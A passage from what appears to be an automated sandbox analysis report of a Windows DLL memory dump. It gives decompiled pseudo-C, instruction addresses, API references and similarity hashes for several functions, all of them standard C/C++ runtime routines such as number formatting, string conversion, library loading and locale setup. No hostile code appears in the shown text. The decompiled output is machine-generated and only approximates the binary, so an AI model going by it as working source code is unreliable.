								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E6DDF39C0(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E6DE375C0( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E6DE37640();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E6DE37640();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E6DE37640();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E6DE1F648(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E6DE378B0(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E6DE12281();
					_t183 = 0x22;
					 *_t129 = _t183;
					E6DE1215B();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}

0x6de1f345
0x6de1f350
0x6de1f357
0x6de1f359
0x6de1f359
0x6de1f35b
0x6de1f364
0x6de1f366
0x6de1f36b
0x6de1f371
0x6de1f387
0x6de1f38c
0x6de1f38f
0x6de1f39c
0x6de1f3a1
0x6de1f3f5
0x6de1f3fd
0x6de1f3ff
0x6de1f401
0x6de1f404
0x6de1f404
0x6de1f404
0x6de1f40a
0x6de1f412
0x6de1f425
0x6de1f428
0x6de1f42a
0x6de1f42d
0x6de1f42e
0x6de1f44f
0x6de1f452
0x6de1f452
0x6de1f430
0x6de1f430
0x6de1f432
0x6de1f43d
0x6de1f43d
0x6de1f43f
0x6de1f446
0x6de1f441
0x6de1f441
0x6de1f441
0x6de1f43f
0x6de1f453
0x6de1f455
0x6de1f456
0x6de1f459
0x6de1f45b
0x6de1f465
0x6de1f46f
0x6de1f45d
0x6de1f45d
0x6de1f45d
0x6de1f474
0x6de1f474
0x6de1f479
0x6de1f47c
0x6de1f487
0x6de1f487
0x6de1f487
0x6de1f487
0x6de1f48b
0x6de1f492
0x6de1f493
0x6de1f496
0x6de1f499
0x6de1f499
0x6de1f49b
0x00000000
0x00000000
0x6de1f4b3
0x6de1f4ba
0x6de1f4be
0x6de1f4c1
0x6de1f4c4
0x6de1f4c6
0x6de1f4c6
0x6de1f4c6
0x6de1f4c8
0x6de1f4cb
0x6de1f4ce
0x6de1f4d0
0x6de1f4d8
0x6de1f4de
0x6de1f4e1
0x6de1f4e4
0x6de1f4e5
0x6de1f4e8
0x6de1f4eb
0x6de1f4eb
0x6de1f4f0
0x6de1f4f3
0x00000000
0x00000000
0x6de1f50b
0x6de1f510
0x6de1f514
0x00000000
0x00000000
0x6de1f518
0x6de1f51b
0x6de1f51c
0x6de1f51c
0x6de1f51e
0x6de1f521
0x00000000
0x00000000
0x6de1f523
0x6de1f526
0x6de1f52d
0x6de1f530
0x6de1f533
0x6de1f549
0x6de1f549
0x6de1f549
0x6de1f535
0x6de1f535
0x6de1f537
0x6de1f53a
0x6de1f545
0x6de1f53c
0x6de1f53f
0x6de1f53f
0x6de1f53a
0x00000000
0x6de1f533
0x6de1f528
0x6de1f528
0x6de1f52a
0x6de1f52a
0x6de1f47e
0x6de1f47e
0x6de1f481
0x6de1f54c
0x6de1f54c
0x6de1f54e
0x6de1f550
0x6de1f553
0x6de1f554
0x6de1f555
0x6de1f556
0x6de1f55e
0x6de1f55e
0x6de1f55e
0x6de1f560
0x6de1f563
0x6de1f566
0x6de1f568
0x6de1f568
0x6de1f56a
0x6de1f57c
0x6de1f580
0x6de1f583
0x6de1f58a
0x6de1f592
0x6de1f592
0x6de1f595
0x6de1f597
0x6de1f5a8
0x6de1f5a8
0x6de1f5ac
0x6de1f5ac
0x6de1f5af
0x6de1f5b1
0x6de1f5b4
0x00000000
0x6de1f599
0x6de1f599
0x6de1f59f
0x6de1f59f
0x6de1f5a3
0x6de1f5b6
0x6de1f5b6
0x6de1f5ba
0x6de1f5bb
0x6de1f5bd
0x6de1f5bf
0x6de1f600
0x6de1f600
0x6de1f602
0x6de1f60f
0x6de1f60f
0x6de1f611
0x6de1f613
0x6de1f614
0x6de1f615
0x6de1f61c
0x6de1f61f
0x6de1f621
0x6de1f621
0x6de1f622
0x6de1f624
0x6de1f627
0x6de1f627
0x6de1f629
0x6de1f62b
0x00000000
0x6de1f62b
0x6de1f604
0x6de1f606
0x00000000
0x00000000
0x6de1f608
0x00000000
0x00000000
0x6de1f60a
0x6de1f60d
0x00000000
0x00000000
0x00000000
0x6de1f60d
0x6de1f5c6
0x6de1f5cc
0x6de1f5cc
0x6de1f5ce
0x6de1f5cf
0x6de1f5d0
0x6de1f5d1
0x6de1f5d8
0x6de1f5db
0x6de1f5dd
0x6de1f5de
0x6de1f5e0
0x6de1f5ed
0x6de1f5ed
0x6de1f5ef
0x6de1f5f1
0x6de1f5f2
0x6de1f5f3
0x6de1f5fa
0x6de1f5fd
0x6de1f5ff
0x6de1f5ff
0x00000000
0x6de1f5ff
0x6de1f5e2
0x6de1f5e2
0x6de1f5e4
0x00000000
0x00000000
0x6de1f5e6
0x00000000
0x00000000
0x6de1f5e8
0x6de1f5eb
0x00000000
0x00000000
0x00000000
0x6de1f5eb
0x6de1f5c8
0x6de1f5ca
0x00000000
0x00000000
0x00000000
0x6de1f5ca
0x6de1f59b
0x6de1f59d
0x00000000
0x00000000
0x00000000
0x6de1f59d
0x6de1f597
0x00000000
0x6de1f481
0x6de1f47c
0x6de1f3a3
0x6de1f3a5
0x00000000
0x6de1f3a7
0x6de1f3bd
0x6de1f3c2
0x6de1f3c4
0x6de1f3d0
0x6de1f3d6
0x6de1f3d7
0x6de1f3d9
0x6de1f3db
0x6de1f3e6
0x6de1f3e6
0x6de1f3e9
0x6de1f3eb
0x6de1f3eb
0x6de1f3ee
0x6de1f3c6
0x6de1f3c6
0x6de1f3c6
0x00000000
0x6de1f3c4
0x6de1f373
0x6de1f373
0x6de1f37a
0x6de1f37b
0x6de1f37d
0x6de1f62f
0x6de1f633
0x6de1f638
0x6de1f638
0x6de1f647
0x6de1f647

APIs

_strrchr.LIBCMT ref: 6DE1F3D0
__alldvrm.LIBCMT ref: 6DE1F5D1
__alldvrm.LIBCMT ref: 6DE1F5F3

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 6deae34975e8103ed65886de447e5f7072f6a5271229e2bb310e9ca1a4878613
Instruction ID: a3b19fe513b9acc275f01d85060012581a435661a780a4f37598abc0634a770d
Opcode Fuzzy Hash: 6deae34975e8103ed65886de447e5f7072f6a5271229e2bb310e9ca1a4878613
Instruction Fuzzy Hash: D8A13473B0C6969FE7028E58CC907AABBE5EF45314F3541ADD594AB381DB388942C790

Uniqueness

Uniqueness Score: -1.00%

Function 6DE26102, Relevance: 6.1, APIs: 4, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E6DE26102(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __esi;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t68;
				signed int _t69;
				short* _t70;

				_t65 = __edx;
				_t34 =  *0x6de9506c; // 0xc4837075
				_v8 = _t34 ^ _t69;
				E6DE01F60(__ebx,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t6 = _v24 + 8; // 0xc0b0a09
					_t53 =  *_t6;
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E6DDEF8A5(_v8 ^ _t69, _t65, _t68);
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0xc
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t68 = 0;
					L11:
					if(_t68 != 0) {
						E6DDF39C0(_t67, _t68, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t68, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t68, _t46, _a20);
						}
					}
					L14:
					E6DDDDEE1(_t68);
					goto L15;
				}
				_t20 = _t55 + 8; // 0xc
				asm("sbb eax, eax");
				_t48 = _t40 & _t20;
				_t21 = _t55 + 8; // 0xc
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t68 = E6DE1F26D(_t63, _t48 & _t63);
					if(_t68 == 0) {
						goto L14;
					}
					 *_t68 = 0xdddd;
					L9:
					_t68 =  &(_t68[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E6DDF01B0();
				_t68 = _t70;
				if(_t68 == 0) {
					goto L14;
				}
				 *_t68 = 0xcccc;
				goto L9;
			}

0x6de26102
0x6de2610a
0x6de26111
0x6de2611d
0x6de26122
0x6de26127
0x6de2612c
0x6de2612c
0x6de2612f
0x6de26131
0x6de26131
0x6de26136
0x6de2614f
0x6de26155
0x6de2615a
0x6de261f9
0x6de261fd
0x6de26202
0x6de26202
0x6de2621e
0x6de2621e
0x6de26160
0x6de26163
0x6de26168
0x6de2616c
0x6de261b8
0x6de261ba
0x6de261bc
0x6de261c1
0x6de261d8
0x6de261e0
0x6de261f0
0x6de261f0
0x6de261e0
0x6de261f2
0x6de261f3
0x00000000
0x6de261f8
0x6de2616e
0x6de26173
0x6de26175
0x6de26177
0x6de26177
0x6de2617f
0x6de2619c
0x6de261a6
0x6de261ab
0x00000000
0x00000000
0x6de261ad
0x6de261b3
0x6de261b3
0x00000000
0x6de261b3
0x6de26183
0x6de26187
0x6de2618c
0x6de26190
0x00000000
0x00000000
0x6de26192
0x00000000

APIs

MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,6DE40EA8,00000000,00000000,008B018B,6DE1DA1E,?,00000004,00000001,6DE40EA8,0000007F,?,008B018B,00000001), ref: 6DE2614F
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 6DE261D8
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6DE261EA
__freea.LIBCMT ref: 6DE261F3

Part of subcall function 6DE1F26D: RtlAllocateHeap.NTDLL(00000000,6DDD75D9,00000000,?,6DDF0F8B,00000002,00000000,?,?,?,6DDB1298,6DDD75D9,00000004,00000000,00000000,00000000), ref: 6DE1F29F

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 2b39187c382fd59206e4e3ad94486b86a6e8e4baa767303eb82ebfdf8b51be77
Instruction ID: bc889ae5b061b3cec9eb5cc740b88735bbe4a279e48eea8534357c2d218feb90
Opcode Fuzzy Hash: 2b39187c382fd59206e4e3ad94486b86a6e8e4baa767303eb82ebfdf8b51be77
Instruction Fuzzy Hash: 8231B272A0021A9BDF158FA4CC81EBE3BA5EB40714F21426DFC18E7251EB35D951CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 6DE23E7F, Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E6DE23E7F(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x6de97908 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x6de41690 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0xc4837076
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}

0x6de23e84
0x6de23e88
0x6de23e8f
0x6de23e93
0x6de23ea1
0x6de23eb7
0x6de23ebb
0x6de23ee4
0x6de23ee6
0x6de23eea
0x6de23eed
0x6de23eed
0x6de23ef3
0x6de23ef5
0x00000000
0x6de23ef6
0x6de23ebd
0x6de23ec6
0x6de23ed5
0x6de23ec8
0x6de23ecb
0x6de23ed1
0x6de23ed1
0x6de23ed9
0x00000000
0x6de23edb
0x6de23ede
0x6de23ee0
0x00000000
0x6de23ee0
0x6de23ed9
0x6de23e95
0x6de23e9a
0x00000000

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,6DE23E26,?,00000000,00000000,00000000,?,6DE241BD,00000006,FlsSetValue), ref: 6DE23EB1
GetLastError.KERNEL32(?,6DE23E26,?,00000000,00000000,00000000,?,6DE241BD,00000006,FlsSetValue,6DE41C58,FlsSetValue,00000000,00000364,?,6DE1D6D1), ref: 6DE23EBD
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,6DE23E26,?,00000000,00000000,00000000,?,6DE241BD,00000006,FlsSetValue,6DE41C58,FlsSetValue,00000000), ref: 6DE23ECB

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 4b1b3d891d4def1192ff3fc3c92346858ed77147735ea6208d52c5f325531f0e
Instruction ID: 1e572a207d9454022c087245def828fd3b322e011d6f3c7f5d01e2d9a190230e
Opcode Fuzzy Hash: 4b1b3d891d4def1192ff3fc3c92346858ed77147735ea6208d52c5f325531f0e
Instruction Fuzzy Hash: 6801F73676532B9BCF328A698C45E6B77ECAF067B57210128F909E7240DF21D845CEE0

Uniqueness

Uniqueness Score: -1.00%

Function 6DDE1558, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E6DDE1558(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t15;
				intOrPtr _t17;
				void* _t20;
				intOrPtr* _t32;
				void* _t35;

				E6DDF00AC(0x6de38a31, __ebx, __edi, __esi, 0x3c);
				_t32 =  *((intOrPtr*)(_t35 + 8));
				_t34 = 0;
				_t23 = 0;
				 *((intOrPtr*)(_t35 - 0x10)) = 0;
				if(_t32 != 0) {
					_t37 =  *_t32;
					if( *_t32 == 0) {
						_push(0x44);
						_t17 = E6DDEF8B6(__edx, 0, _t37);
						 *((intOrPtr*)(_t35 - 0x14)) = _t17;
						 *((intOrPtr*)(_t35 - 4)) = 0;
						if(_t17 != 0) {
							_push(E6DDB1703( *((intOrPtr*)(_t35 + 0xc))));
							_t20 = E6DDB1450(0, _t35 - 0x48, __edx, _t32, 0);
							_t23 = 1;
							_push(0);
							_push(_t20);
							 *((char*)(_t35 - 4)) = 1;
							 *((intOrPtr*)(_t35 - 0x10)) = 1;
							_t34 = E6DDE0143( *((intOrPtr*)(_t35 - 0x14)), 0);
						}
						 *_t32 = _t34;
						if((_t23 & 0x00000001) != 0) {
							E6DDB14CE(_t35 - 0x48);
						}
					}
				}
				_t15 = 5;
				return E6DDF0075(_t15);
			}

0x6dde155f
0x6dde1564
0x6dde1567
0x6dde1569
0x6dde156b
0x6dde1570
0x6dde1572
0x6dde1574
0x6dde1576
0x6dde1578
0x6dde157e
0x6dde1581
0x6dde1586
0x6dde1590
0x6dde1594
0x6dde159c
0x6dde159d
0x6dde159e
0x6dde159f
0x6dde15a2
0x6dde15aa
0x6dde15aa
0x6dde15ac
0x6dde15b1
0x6dde15b6
0x6dde15b6
0x6dde15b1
0x6dde1574
0x6dde15bd
0x6dde15c3

APIs

__EH_prolog3.LIBCMT ref: 6DDE155F
std::_Locinfo::_Locinfo.LIBCPMT ref: 6DDE1594

Part of subcall function 6DDB1450: __EH_prolog3.LIBCMT ref: 6DDB1457
Part of subcall function 6DDB1450: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB1464
Part of subcall function 6DDB1450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6DDB14A1

numpunct.LIBCPMT ref: 6DDE15A5

Part of subcall function 6DDE0143: __EH_prolog3.LIBCMT ref: 6DDE014A

std::_Locinfo::~_Locinfo.LIBCPMT ref: 6DDE15B6

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: std::_$H_prolog3$LocinfoLocinfo::_$Locinfo::~_Locinfo_ctorLockitLockit::_numpunct
String ID:
API String ID: 495030518-0
Opcode ID: 50f75bcb4e606ee57997536ce91da05be5bfb36e8bee3af63760ba7500a9555b
Instruction ID: 8dbf1575f39f9a1ba529aaa11965bfb2d55b1d26fa2371917e62e11543cc127a
Opcode Fuzzy Hash: 50f75bcb4e606ee57997536ce91da05be5bfb36e8bee3af63760ba7500a9555b
Instruction Fuzzy Hash: 400181B1A44216DADB00EBA4C850BAE7B74AF447C8F520119F65AAB285CBB04A01CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 6DDE14EC, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E6DDE14EC(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t15;
				intOrPtr _t17;
				void* _t20;
				intOrPtr* _t32;
				void* _t35;

				E6DDF00AC(0x6de38a31, __ebx, __edi, __esi, 0x3c);
				_t32 =  *((intOrPtr*)(_t35 + 8));
				_t34 = 0;
				_t23 = 0;
				 *((intOrPtr*)(_t35 - 0x10)) = 0;
				if(_t32 != 0) {
					_t37 =  *_t32;
					if( *_t32 == 0) {
						_push(0x44);
						_t17 = E6DDEF8B6(__edx, 0, _t37);
						 *((intOrPtr*)(_t35 - 0x14)) = _t17;
						 *((intOrPtr*)(_t35 - 4)) = 0;
						if(_t17 != 0) {
							_push(E6DDB1703( *((intOrPtr*)(_t35 + 0xc))));
							_t20 = E6DDB1450(0, _t35 - 0x48, __edx, _t32, 0);
							_t23 = 1;
							_push(0);
							_push(_t20);
							 *((char*)(_t35 - 4)) = 1;
							 *((intOrPtr*)(_t35 - 0x10)) = 1;
							_t34 = E6DDE0110( *((intOrPtr*)(_t35 - 0x14)), 0);
						}
						 *_t32 = _t34;
						if((_t23 & 0x00000001) != 0) {
							E6DDB14CE(_t35 - 0x48);
						}
					}
				}
				_t15 = 5;
				return E6DDF0075(_t15);
			}

0x6dde14f3
0x6dde14f8
0x6dde14fb
0x6dde14fd
0x6dde14ff
0x6dde1504
0x6dde1506
0x6dde1508
0x6dde150a
0x6dde150c
0x6dde1512
0x6dde1515
0x6dde151a
0x6dde1524
0x6dde1528
0x6dde1530
0x6dde1531
0x6dde1532
0x6dde1533
0x6dde1536
0x6dde153e
0x6dde153e
0x6dde1540
0x6dde1545
0x6dde154a
0x6dde154a
0x6dde1545
0x6dde1508
0x6dde1551
0x6dde1557

APIs

__EH_prolog3.LIBCMT ref: 6DDE14F3
std::_Locinfo::_Locinfo.LIBCPMT ref: 6DDE1528

Part of subcall function 6DDB1450: __EH_prolog3.LIBCMT ref: 6DDB1457
Part of subcall function 6DDB1450: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB1464
Part of subcall function 6DDB1450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6DDB14A1

numpunct.LIBCPMT ref: 6DDE1539

Part of subcall function 6DDE0110: __EH_prolog3.LIBCMT ref: 6DDE0117

std::_Locinfo::~_Locinfo.LIBCPMT ref: 6DDE154A

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: std::_$H_prolog3$LocinfoLocinfo::_$Locinfo::~_Locinfo_ctorLockitLockit::_numpunct
String ID:
API String ID: 495030518-0
Opcode ID: 69781fce4cba1ee933b9060826af0754b86f9b41f55c42c410fa65e5f02c3624
Instruction ID: 6101de75cbd1e4fbecb04ea3cb25b8c15983ac3c3ec19f1310d45bcbca4d8902
Opcode Fuzzy Hash: 69781fce4cba1ee933b9060826af0754b86f9b41f55c42c410fa65e5f02c3624
Instruction Fuzzy Hash: B0018671A44226DBDB01EBA8C940BFE7B75AF047C4F12001AF61AAB245CF704A01C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 6DDEC229, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E6DDEC229(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t15;
				intOrPtr _t17;
				void* _t20;
				intOrPtr* _t32;
				void* _t35;

				E6DDF00AC(0x6de38a31, __ebx, __edi, __esi, 0x3c);
				_t32 =  *((intOrPtr*)(_t35 + 8));
				_t34 = 0;
				_t23 = 0;
				 *((intOrPtr*)(_t35 - 0x10)) = 0;
				if(_t32 != 0) {
					_t37 =  *_t32;
					if( *_t32 == 0) {
						_push(0x44);
						_t17 = E6DDEF8B6(__edx, 0, _t37);
						 *((intOrPtr*)(_t35 - 0x14)) = _t17;
						 *((intOrPtr*)(_t35 - 4)) = 0;
						if(_t17 != 0) {
							_push(E6DDB1703( *((intOrPtr*)(_t35 + 0xc))));
							_t20 = E6DDB1450(0, _t35 - 0x48, __edx, _t32, 0);
							_t23 = 1;
							_push(0);
							_push(_t20);
							 *((char*)(_t35 - 4)) = 1;
							 *((intOrPtr*)(_t35 - 0x10)) = 1;
							_t34 = E6DDEBD9F( *((intOrPtr*)(_t35 - 0x14)), 0);
						}
						 *_t32 = _t34;
						if((_t23 & 0x00000001) != 0) {
							E6DDB14CE(_t35 - 0x48);
						}
					}
				}
				_t15 = 5;
				return E6DDF0075(_t15);
			}

0x6ddec230
0x6ddec235
0x6ddec238
0x6ddec23a
0x6ddec23c
0x6ddec241
0x6ddec243
0x6ddec245
0x6ddec247
0x6ddec249
0x6ddec24f
0x6ddec252
0x6ddec257
0x6ddec261
0x6ddec265
0x6ddec26d
0x6ddec26e
0x6ddec26f
0x6ddec270
0x6ddec273
0x6ddec27b
0x6ddec27b
0x6ddec27d
0x6ddec282
0x6ddec287
0x6ddec287
0x6ddec282
0x6ddec245
0x6ddec28e
0x6ddec294

APIs

__EH_prolog3.LIBCMT ref: 6DDEC230
std::_Locinfo::_Locinfo.LIBCPMT ref: 6DDEC265

Part of subcall function 6DDB1450: __EH_prolog3.LIBCMT ref: 6DDB1457
Part of subcall function 6DDB1450: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB1464
Part of subcall function 6DDB1450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6DDB14A1

numpunct.LIBCPMT ref: 6DDEC276

Part of subcall function 6DDEBD9F: __EH_prolog3.LIBCMT ref: 6DDEBDA6

std::_Locinfo::~_Locinfo.LIBCPMT ref: 6DDEC287

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: std::_$H_prolog3$LocinfoLocinfo::_$Locinfo::~_Locinfo_ctorLockitLockit::_numpunct
String ID:
API String ID: 495030518-0
Opcode ID: 10a147391392615bdfdc9425f71433c0976abccea55406db77a7456afa5ebea6
Instruction ID: 1c88ec565e87d71766ee54ac0dd10678b60a1499e817ec9009b384377bf10ec5
Opcode Fuzzy Hash: 10a147391392615bdfdc9425f71433c0976abccea55406db77a7456afa5ebea6
Instruction Fuzzy Hash: 2D018171944216DBDB10EFA8C880BAE7B74AF047C4F160119F655AB281CBB04A01C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6DDB18A0, Relevance: 6.0, APIs: 4, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E6DDB18A0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t12;
				void* _t16;
				intOrPtr* _t28;
				intOrPtr* _t30;
				void* _t31;

				E6DDF00AC(0x6de37d45, __ebx, __edi, __esi, 0x34);
				_t28 =  *((intOrPtr*)(_t31 + 8));
				if(_t28 != 0) {
					_t33 =  *_t28;
					if( *_t28 == 0) {
